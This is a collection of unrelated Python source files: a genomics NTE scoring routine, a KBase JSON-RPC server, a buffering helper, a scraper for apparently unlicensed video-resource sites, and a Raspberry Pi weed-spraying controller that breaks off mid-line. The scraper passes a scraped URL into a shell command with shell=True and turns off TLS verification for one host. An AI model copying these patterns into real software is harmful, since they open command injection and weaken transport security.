'RNA':0, 'RPF':0} quantified_search_regions_dict[name][atis_id][atis_region]['psites'] = [0,0,0] for nt in range(etc[atis_region][0], etc[atis_region][1]+1): if nt in sr_psites_dict: psite_ct = len(sr_psites_dict[nt]) rpf_ct = len(sr_RPF_dict[nt]) rna_ct = len(sr_RNA_dict[nt]) if sign == '+': reading_frame = (nt - gene_start_codon - 1 ) % 3 else: reading_frame = (gene_start_codon - nt) % 3 quantified_search_regions_dict[name][atis_id][atis_region]['psites'][reading_frame] += psite_ct quantified_search_regions_dict[name][atis_id][atis_region]['RPF'] += rpf_ct quantified_search_regions_dict[name][atis_id][atis_region]['RNA'] += rna_ct print('Writing data out:') resource_pickle_name = ('{}_quantified_search_regions_dict.p').format(args.output_file) print('\t' + resource_pickle_name) with open(resource_pickle_name, 'wb') as file: pickle.dump(quantified_search_regions_dict, file) resource_pickle_name = ('{}_atis_id_dict.p').format(args.output_file) print('\t' + resource_pickle_name) with open(resource_pickle_name, 'wb') as file: pickle.dump(atis_id_dict, file) if args.evaluate: union_set = set() quantified_search_regions_dict = {'union':{}} sample_dict = {} atis_id_dict = {} print('Loading data: ') for each_sample in args.sample_list: pickle_out = ('{}_quantified_search_regions_dict.p').format(each_sample) print('\t' + pickle_out) quantified_search_regions_dict[each_sample] = pickle.load(open(pickle_out, 'rb')) pickle_out = ('{}_sample_dict.p').format(each_sample) print('\t' + pickle_out) sample_dict[each_sample] = pickle.load(open(pickle_out, 'rb')) pickle_out = ('{}_atis_id_dict.p').format(each_sample) print('\t' + pickle_out) atis_id_dict[each_sample] = pickle.load(open(pickle_out, 'rb')) for atis_id, _etc in atis_id_dict[each_sample].items(): union_set.add(atis_id) athird = float(1/3) eval_atis_dict = {} score_dict = {} nte_candidate_file_name = ('{}.bed').format(args.output_file) nte_candidate_file = open(nte_candidate_file_name, 'w') nte_potential_file_name = ('{}_potential.bed').format(args.output_file) nte_potential_file = open(nte_potential_file_name, 'w') print('Evaluating candidate NTE events... ') for atis_id in union_set: eval_atis(atis_id, athird) for name, atis_scores in score_dict.items(): best_score = 0 best_set = [0,0,0] best_atis = '' for atis_id, atis_score in atis_scores.items(): if len(atis_score) > 0: calc_score = sum(atis_score) if best_atis != atis_id: if calc_score > best_score: best_score = calc_score best_atis = atis_id best_set = atis_score if calc_score == best_score: if np.median(atis_score) > np.median(best_set): best_score = calc_score best_atis = atis_id best_set = atis_score if best_atis != '': output_bed(name, best_atis, best_score, atis_id_dict, nte_candidate_file) nte_potential_file.close() nte_candidate_file.close() print('Completed evaluation of candidate NTE events results saved in ', nte_candidate_file_name)
imramboContigFilterServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import datetime import json import os import random as _random import sys import traceback from getopt import getopt, GetoptError from multiprocessing import Process from os import environ from wsgiref.simple_server import make_server import requests as _requests from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from biokbase import log from imramboContigFilter.authclient import KBaseAuth as _KBaseAuth try: from ConfigParser import ConfigParser except ImportError: from configparser import ConfigParser DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'imramboContigFilter'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from imramboContigFilter.imramboContigFilterImpl import imramboContigFilter # noqa @IgnorePep8 impl_imramboContigFilter = imramboContigFilter(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if len(e.args) == 1: newerr.data = repr(e.args[0]) else: newerr.data = repr(e.args) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. """ rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if 'types' in self.method_data[request['method']]: self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'imramboContigFilter' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_imramboContigFilter.run_imramboContigFilter, name='imramboContigFilter.run_imramboContigFilter', types=[dict]) self.method_authentication['imramboContigFilter.run_imramboContigFilter'] = 'required' # noqa self.rpc_service.add(impl_imramboContigFilter.run_imramboContigFilter_max, name='imramboContigFilter.run_imramboContigFilter_max', types=[dict]) self.method_authentication['imramboContigFilter.run_imramboContigFilter_max'] = 'required' # noqa self.rpc_service.add(impl_imramboContigFilter.run_imramboContigFilter_min, name='imramboContigFilter.run_imramboContigFilter_min', types=[dict]) self.method_authentication['imramboContigFilter.run_imramboContigFilter_min'] = 'required' # noqa self.rpc_service.add(impl_imramboContigFilter.status, name='imramboContigFilter.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'imramboContigFilter ' + 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception as e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print('Request method was %s\n' % environ['REQUEST_METHOD']) # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ)) # print('Request body was: %s' % request_body) # print('Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result)) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body.encode('utf8')] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. # This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print("Monkeypatching std libraries for async") from gevent import monkey monkey.patch_all() uwsgi.applications = {'': application} except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print("Listening on port %s" % port) if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as err: # print help information and exit: print(str(err)) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print("Host set to %s" % host) else: assert False, "unhandled option" start_server(host=host, port=port) # print("Listening on port %s" % port) # httpd = make_server( host, port, application) # # httpd.serve_forever()
buffering.py
"""Wrapper functions to make iterators buffered. """ import multiprocessing as mp import threading import traceback import Queue def buffered_gen_mp(source_gen, buffer_size=2): """ Generator that runs a slow source generator in a separate process. buffer_size: the maximal number of items to pre-generate (length of the buffer) """ if buffer_size < 2: raise RuntimeError("Minimal buffer size is 2!") buffer = mp.Queue(maxsize=buffer_size - 1) # the effective buffer size is one less, because the generation process # will generate one extra element and block until there is room in the buffer. def _buffered_generation_process(source_gen, buffer): try: for data in source_gen: buffer.put(data, block=True) finally: print "putting None" buffer.put(None) # sentinel: signal the end of the iterator buffer.close() # unfortunately this does not suffice as a signal: if buffer.get() # was called and subsequently the buffer is closed, it will block forever. process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer)) process.start() for data in iter(buffer.get, None): yield data def buffered_gen_threaded(source_gen, buffer_size=2): """ Generator that runs a slow source generator in a separate thread. Beware of the GIL! buffer_size: the maximal number of items to pre-generate (length of the buffer) """ if buffer_size < 2: raise RuntimeError("Minimal buffer size is 2!") buffer = Queue.Queue(maxsize=buffer_size - 1) # the effective buffer size is one less, because the generation process # will generate one extra element and block until there is room in the buffer. def _buffered_generation_thread(source_gen, buffer): try: for data in source_gen: buffer.put(data, block=True) except: traceback.print_exc() import sys sys.exit(1) finally: buffer.put(None) # sentinel: signal the end of the iterator thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer)) thread.daemon = True thread.start() for data in iter(buffer.get, None): yield data
search.py
import re import time import subprocess import threading import requests from lxml import html import urllib3 urllib3.disable_warnings() domain_list = [ "http://kubozy.net/", "http://zy.kakazycj.com/", "http://www.kubozy.org/", "http://zycaiji.com/", "http://www.zxziyuan.com/", "http://api.kbzyapi.com/", "http://www.kuyunzyw.tv/", "http://www.kuyun.co/", "http://superpan.me/", "http://www.gxzyw.net/", "http://www.yongjiuzy1.com/", "http://www.yongjiuzy2.com/", "http://www.yongjiuzy3.com/", "http://www.yongjiuzy4.com/", "http://www.yongjiuzy5.com/", "http://yongjiuzy.vip/", "http://135zy0.com/", "http://www.okzyw.com/", "http://okzy.co/", "http://www.haozy.cc/", "http://www.okzyw.net/", "http://www.apiokzy.com/", "http://www.okp2pzy.com/", "http://zy.yswy.top/", "http://www.okokzy.net/", "http://www.okzyw.cc/", "https://okzy8.com/", "http://haku77.com/", "http://www.okzy10.com/", "http://www.okzy5.com/", "http://okzy1.com/", "http://www.zuidazy5.com/", "http://www.zuidazy1.com/", "http://135zy1.com/", "http://cj.135zy.co/", # "http://kuyunzy1.com/", # "http://www.kuyunzyw.vip/", # "http://kuyun9.com/", # "http://www.kuyunzy1.com/", # "http://ys1.xingyaox.com/", # "http://vip.xiaoheizaixian.com/", # "http://61166.net", # "http://www.btdytt8.net", # "http://www.panmanman.com/", # "https://xqzxwz.com/", # "http://v.hyage.com/", ] domain_list = [ "https://wolongzy.net/", "http://zy.bajieziyuan.com/", "http://www.mahuazy.net/", "http://zuidazy.net/", "http://www.156zy.cc/", # "http://kuyunzy.cc/", "http://www.haozy.cc/", "http://www.765zy.com/", # "http://www.kukuzy.com/", # "http://www.1977zy.com/", "http://zuikzy.cc/", "http://www.123ku.com/", "http://kankanzy.com/", "http://www.doubanzy.com/", "http://gaoqingzy.com/", "http://zuidazy2.com/", "http://www.subo8988.com/", "http://www.leduozy.com/", "http://yongjiuzy.cc/", "http://www.ziyuanpian.net/", "http://www.666zy.com/", "https://www.baiwanzy.com/", "http://www.wuxiou.com/", "http://www.bbkdj.com/", "http://niuniuzy.com/", # "http://www.398zy.com/", "http://www.czhiziyuan.com/", "http://kubozy.net/", # "http://chaojizy.com/", "https://www.mb700.com/", "http://www.zuixinzy.cc/", "https://www.solezy.com/", "https://mokazy.com/", "http://265zy.cc/", # "http://www.88zyw.net/", # "http://www.mp4ba.cc/", # "http://www.agenya.cn/", "http://zy.ataoju.com/", "http://zy.itono.cn/", # "https://zy.nmbaojie.com/", # "http://www.ttzy.cc/", # "http://www.ckzy.cc/", "http://www.156zy.me/", ] # for d in domain_list: # _ = requests.get(d).url # if _ != d: # print(d, _) # else: # print(d, True) # input() print("Keyword: ", end="") keyword = input() if keyword == "": # keyword = "女皇之刃" keyword = "猫娘乐园" error_list = [] result_list = {} ps = [] sema = threading.Semaphore(value=2**4) for _i, domain in enumerate(domain_list): def job(_i, domain): try: sema.acquire() start = time.time() # if domain != "http://kankanzy.com/": # continue url = domain+"index.php?m=vod-search" data = { "wd": keyword, "submit": "search" } try: r = requests.post(url, data) except: error_list.append(domain) raise Exception if r.status_code == 404: error_list.append(domain) raise Exception r = r.content.decode() # print(url, data, r) # input() r = html.fromstring(r) result = r.xpath("//div[@class='xing_vb']/ul")[1:-1] if len(result) == 0: raise Exception # print(domain+"\t\t"+str(len(result))) for r in result: # title = r.xpath(".//span[@class='xing_vb4']/a/text()")[0].strip() url = r.xpath(".//span[@class='xing_vb4']/a/@href")[0] url = domain+url url = url.replace("//?", "/?") r = requests.get(url).content.decode() title = re.search(r"<h2>(.*?)<\/h2>", r)[1] title = re.sub(r"<.*?>", "", title) m3u8s = re.findall(r"\"(http.*?m3u8)\"", r) try: verify = True if "s1.jxtvsb.com" in m3u8s[0]: # print(m3u8s[0]) verify = False check = requests.get(m3u8s[0], verify=verify).status_code except: check = 404 if check != 200: # print(title+"\t\t"+str(check), url) continue title_key = title+f"[{len(m3u8s)}]" if title_key not in result_list: result_list[title_key] = [] result_list[title_key].append(url) # print("\t"+title+"\t\t"+url) # print() print(f"\rProgress: {_i+1}/{len(domain_list)}\n", end="", flush=True) except: pass finally: sema.release() p = threading.Thread(target=job, args=(_i, domain)) ps.append(p) p.start() for p in ps: p.join() print() # for k, v in result_list.items(): # print(k, v) # print("error_list", error_list) for _i, k in enumerate(result_list.keys()): print(f"{_i+1}: {k}", result_list[k]) print("\nEnter Choice: ", end="") choices = input().split() # print(choices) urls = [] for choice in choices: k = list(result_list.keys())[int(choice)-1] urls += result_list[k] # print(result_list[k]) cmd = f'download.py "{urls[0]}"' # print(cmd) subprocess.run(cmd, shell=True)
greenonbrown.py
#!/home/pi/.virtualenvs/owl/bin/python3 from algorithms import exg, exg_standardised, exg_standardised_hue, hsv, exgr, gndvi, maxg from button_inputs import Selector, Recorder from image_sampler import image_sample from imutils.video import VideoStream, FileVideoStream, FPS from relay_control import Controller from queue import Queue from time import strftime import subprocess import imutils import shutil import numpy as np import time import sys import cv2 import os def nothing(x): pass def green_on_brown(image, exgMin=30, exgMax=250, hueMin=30, hueMax=90, brightnessMin=5, brightnessMax=200, saturationMin=30, saturationMax=255, minArea=1, headless=True, algorithm='exg'): ''' Uses a provided algorithm and contour detection to determine green objects in the image. Min and Max thresholds are provided. :param image: input image to be analysed :param exgMin: :param exgMax: :param hueMin: :param hueMax: :param brightnessMin: :param brightnessMax: :param saturationMin: :param saturationMax: :param minArea: minimum area for the detection - used to filter out small detections :param headless: True: no windows display; False: watch what the algorithm does :param algorithm: the algorithm to use. Defaults to ExG if not correct :return: returns the contours, bounding boxes, centroids and the image on which the boxes have been drawn ''' # different algorithm options, add in your algorithm here if you make a new one! threshedAlready = False if algorithm == 'exg': output = exg(image) elif algorithm == 'exgr': output = exgr(image) elif algorithm == 'maxg': output = maxg(image) elif algorithm == 'nexg': output = exg_standardised(image) elif algorithm == 'exhsv': output = exg_standardised_hue(image, hueMin=hueMin, hueMax=hueMax, brightnessMin=brightnessMin, brightnessMax=brightnessMax, saturationMin=saturationMin, saturationMax=saturationMax) elif algorithm == 'hsv': output, threshedAlready = hsv(image, hueMin=hueMin, hueMax=hueMax, brightnessMin=brightnessMin, brightnessMax=brightnessMax, saturationMin=saturationMin, saturationMax=saturationMax) elif algorithm == 'gndvi': output = gndvi(image) else: output = exg(image) print('[WARNING] DEFAULTED TO EXG') if not headless: cv2.imshow("Threshold", output) # run the thresholds provided kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3)) # if not a binary image, run an adaptive threshold on the area that fits within the thresholded bounds. if not threshedAlready: output = np.where(output > exgMin, output, 0) output = np.where(output > exgMax, 0, output) output = np.uint8(np.abs(output)) if not headless: cv2.imshow("post", output) thresholdOut = cv2.adaptiveThreshold(output, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 2) thresholdOut = cv2.morphologyEx(thresholdOut, cv2.MORPH_CLOSE, kernel, iterations=1) # if already binary, run morphological operations to remove any noise if threshedAlready: thresholdOut = cv2.morphologyEx(output, cv2.MORPH_CLOSE, kernel, iterations=5) if not headless: cv2.imshow("Threshold", thresholdOut) # find all the contours on the binary images cnts = cv2.findContours(thresholdOut.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) cnts = imutils.grab_contours(cnts) weedCenters = [] boxes = [] # loop over all the detected contours and calculate the centres and bounding boxes for c in cnts: # filter based on total area of contour if cv2.contourArea(c) > minArea: # calculate the min bounding box startX, startY, boxW, boxH = cv2.boundingRect(c) endX = startX + boxW endY = startY + boxH cv2.rectangle(image, (int(startX), int(startY)), (endX, endY), (0, 0, 255), 2) # save the bounding box boxes.append([startX, startY, boxW, boxH]) # compute box center centerX = int(startX + (boxW / 2)) centerY = int(startY + (boxH / 2)) weedCenters.append([centerX, centerY]) # returns the contours, bounding boxes, centroids and the image on which the boxes have been drawn return cnts, boxes, weedCenters, image # the class Owl: def __init__(self, video=False, videoFile=None, recording=False, nozzleNum=4, headless=True, exgMin=30, exgMax=180, hueMin=30,hueMax=92, brightnessMin=5, brightnessMax=200, saturationMin=30, saturationMax=255, resolution=(832, 624), framerate=32): # different detection parameters self.headless = headless self.recording = recording self.resolution = resolution self.framerate = framerate # threshold parameters for different algorithms self.exgMin = exgMin self.exgMax = exgMax self.hueMin = hueMin self.hueMax = hueMax self.saturationMin = saturationMin self.saturationMax = saturationMax self.brightnessMin = brightnessMin self.brightnessMax = brightnessMax # setup the track bars if headless is False if not self.headless: # create trackbars for the threshold calculation cv2.namedWindow("Params") cv2.createTrackbar("thresholdMin", "Params", self.exgMin, 255, nothing) cv2.createTrackbar("thresholdMax", "Params", self.exgMax, 255, nothing) # instantiate the recorder if recording is True if self.recording: self.fourcc = cv2.VideoWriter_fourcc(*'MJPG') self.writer = None else: self.record = False self.saveRecording = False # check if test video or videostream from camera if video: self.cam = FileVideoStream(videoFile).start() # if no video, start the camera with the provided parameters else: try: self.cam = VideoStream(usePiCamera=True, resolution=self.resolution, framerate=self.framerate).start() except ModuleNotFoundError: self.cam = VideoStream(src=0).start() time.sleep(1.0) # set the sprayqueue size self.sprayQueue = Queue(maxsize=10) # nozzleDict maps the reference nozzle number to a boardpin on the embedded device self.nozzleDict = { 0: 13, 1: 15, 2: 16, 3: 18 } ### Data collection only ### # algorithmDict maps pins to algorithms for data collection self.algorithmDict = { "exg": 29, "nexg": 31, "hsv": 33, "exhsv": 35, } # this is where the recording button can be added. Currently set to pin 37 if self.recording: self.recorderButton = Recorder(recordGPIO=37) ############################ # instantiate the nozzle controller - successful start should beep the buzzer self.controller = Controller(nozzleDict=self.nozzleDict) # instantiate the logger self.logger = self.controller.logger # sensitivity and weed size to be added self.sensitivity = None self.laneCoords = {} # add the total number of nozzles. This can be changed easily, but the nozzleDict and physical relays would need # to be updated too. Fairly straightforward, so an opportunity for more precise application self.nozzleNum = nozzleNum def hoot(self, sprayDur, delay, sample=False, sampleDim=400, saveDir='output', camera_name='cam1', algorithm='exg', selectorEnabled=False, minArea=10): # track FPS and framecount fps = FPS().start() if selectorEnabled: self.selector = Selector(switchDict=self.algorithmDict) try: while True: delay = self.update_delay(delay) frame = self.cam.read() if selectorEnabled: algorithm, newAlgorithm = self.selector.algorithm_selector(algorithm) if newAlgorithm: self.logger.log_line('[NEW ALGO] {}'.format(algorithm)) if self.recording: self.record = self.recorderButton.record self.saveRecording = self.recorderButton.saveRecording if frame is None: fps.stop() print("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps())) self.stop() break if self.record and self.writer is None: saveDir = os.path.join(saveDir, strftime("%Y%m%d-{}-{}".format(camera_name, algorithm))) if not os.path.exists(saveDir): os.makedirs(saveDir) self.baseName = os.path.join(saveDir, strftime("%Y%m%d-%H%M%S-{}-{}".format(camera_name, algorithm))) videoName = self.baseName + '.avi' self.logger.new_video_logfile(name=self.baseName + '.txt') self.writer = cv2.VideoWriter(videoName, self.fourcc, 30, (frame.shape[1], frame.shape[0]), True) # retrieve the trackbar positions for thresholds if not self.headless: self.exgMin = cv2.getTrackbarPos("thresholdMin", "Params") self.exgMax = cv2.getTrackbarPos("thresholdMax", "Params") else: # this leaves it open to adding dials for sensitivity. Static at the moment, but could be dynamic self.update(exgMin=self.exgMin, exgMax=self.exgMax) # add in update values here # pass image, thresholds to green_on_brown function cnts, boxes, weedCentres, imageOut = green_on_brown(frame.copy(), exgMin=self.exgMin, exgMax=self.exgMax, hueMin=self.hueMin, hueMax=self.hueMax, saturationMin=self.saturationMin, saturationMax=self.saturationMax, brightnessMin=self.brightnessMin, brightnessMax=self.brightnessMax, headless=self.headless, algorithm=algorithm, minArea=minArea) ##### IMAGE SAMPLER ##### # record sample images if required of weeds detected # uncomment if needed # if frameCount % 60 == 0 and sample is True: # saveFrame = frame.copy() # sampleThread = Thread(target=image_sample, args=[saveFrame, weedCentres, saveDir, sampleDim]) # sampleThread.start() ######################### # activation region limit - once weed crosses this line, nozzle is activated self.yAct = int((0.2) * frame.shape[0]) laneWidth 